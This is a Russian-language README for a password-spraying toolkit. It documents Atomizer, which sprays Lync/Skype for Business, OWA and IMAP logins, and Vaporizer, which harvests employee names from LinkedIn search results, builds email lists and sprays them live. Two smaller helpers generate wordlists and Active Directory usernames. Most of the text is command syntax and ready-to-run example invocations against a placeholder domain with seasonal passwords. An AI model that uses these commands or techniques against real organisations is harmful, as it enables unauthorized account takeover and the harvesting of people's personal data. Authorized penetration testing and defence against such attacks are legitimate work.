
Скрипты для проведения атак password spraying против Lync/S4B, OWA и O365 — делают их гораздо быстрее, менее болезненными и более эффективными.
Этот проект больше не поддерживается. Следующие альтернативные проекты лучше и активно поддерживаются:
Набор Python-скриптов/утилит, которые пытаются сделать атаки распыления паролей (password spraying) против Lync/S4B и OWA намного быстрее, менее болезненными и более эффективными.
Заходите пообщаться в Discord!
Установите предварительные зависимости с помощью pip3 следующим образом:
sudo -H pip3 install -r requirements.txt
Или используйте виртуальное окружение Python, если не хотите устанавливать пакеты глобально.
Молниеносный распылитель паролей для Lync/Skype For Business и OWA, построенный на Asyncio и Python 3.7
Usage:
atomizer (lync|owa|imap) <target> <password> <userfile> [--targetPort PORT] [--threads THREADS] [--debug]
atomizer (lync|owa|imap) <target> <passwordfile> <userfile> --interval <TIME> [--gchat <URL>] [--slack <URL>] [--targetPort PORT][--threads THREADS] [--debug]
atomizer (lync|owa|imap) <target> --csvfile CSVFILE [--user-row-name NAME] [--pass-row-name NAME] [--targetPort PORT] [--threads THREADS] [--debug]
atomizer (lync|owa|imap) <target> --user-as-pass USERFILE [--targetPort PORT] [--threads THREADS] [--debug]
atomizer (lync|owa|imap) <target> --recon [--debug]
atomizer -h | --help
atomizer -v | --version
Arguments:
target target domain or url
password password to spray
userfile file containing usernames (one per line)
passwordfile file containing passwords (one per line)
Options:
-h, --help show this screen
-v, --version show version
-c, --csvfile CSVFILE csv file containing usernames and passwords
-i, --interval TIME spray at the specified interval [format: "H:M:S"]
-t, --threads THREADS number of concurrent threads to use [default: 3]
-d, --debug enable debug output
-p, --targetPort PORT target port of the IMAP server (IMAP only) [default: 993]
--recon only collect info, don't password spray
--gchat URL gchat webhook url for notification
--slack URL slack webhook url for notification
--user-row-name NAME username row title in CSV file [default: Email Address]
--pass-row-name NAME password row title in CSV file [default: Password]
--user-as-pass USERFILE use the usernames in the specified file as the password (one per line)
./atomizer.py owa contoso.com 'Fall2018' emails.txt
./atomizer.py lync contoso.com 'Fall2018' emails.txt
./atomizer lync contoso.com --csvfile accounts.csv
./atomizer lync contoso.com --user-as-pass usernames.txt
./atomizer owa 'https://owa.contoso.com/autodiscover/autodiscover.xml' --recon
./atomizer.py owa contoso.com passwords.txt emails.txt -i 0:45:00 --gchat <GCHAT_WEBHOOK_URL>
Порт расширения Burp @OrOneEqualsOne GatherContacts на mitmproxy с некоторыми улучшениями.
Собирает данные из Google и Bing о профилях LinkedIn, автоматически генерирует адреса электронной почты из имён в профилях по заданному шаблону и выполняет распыление паролей в реальном времени.
(Построен на основе Atomizer)
mitmdump -s vaporizer.py --set sprayer=(lync|owa) --set domain=domain.com --set target=<domain or url to spray> --set password=password --set email_format='{f}.{last}'
По умолчанию email_format задан как шаблон {first}.{last} и не является обязательным аргументом.
Параметр domain — это домен, используемый для генерации адресов электронной почты из имён; параметр target — это домен или URL для распыления паролей.
Установите сертификат mitmproxy, укажите прокси в браузере, перейдите в Google и/или Bing и выполните поиск (не забудьте включить /in):
site:linkedin.com/in "Target Company Name"
Адреса электронной почты будут сохранены в emails.txt в указанном формате и переданы в Atomizer для распыления.
Извлекает весь текст с целевого веб-сайта и отправляет его в AWS Comprehend для анализа с целью генерации пользовательских списков слов для распыления паролей.
Всё ещё находится в разработке
mitmdump -s aerosol.py --set domain=domain.com
Преобразует имена в имена пользователей Active Directory (например, Alice Eve => CONTOSO\aeve)
Usage:
spindrift [<file>] [--target TARGET | --domain DOMAIN] [--format FORMAT]
Arguments:
file file containing names, can also read from stdin
Options:
--target TARGET optional domain or url to retrieve the internal domain name from OWA
--domain DOMAIN manually specify the domain to append to each username
--format FORMAT username format [default: {f}{last}]
Читает имена из STDIN, --domain используется для указания домена вручную:
cat names.txt | ./spindrift.py --domain CONTOSO
Читает имена из names.txt, --target динамически получает внутреннее имя домена из OWA (можно указать домен или URL):
./spindrift.py names.txt --target contoso.com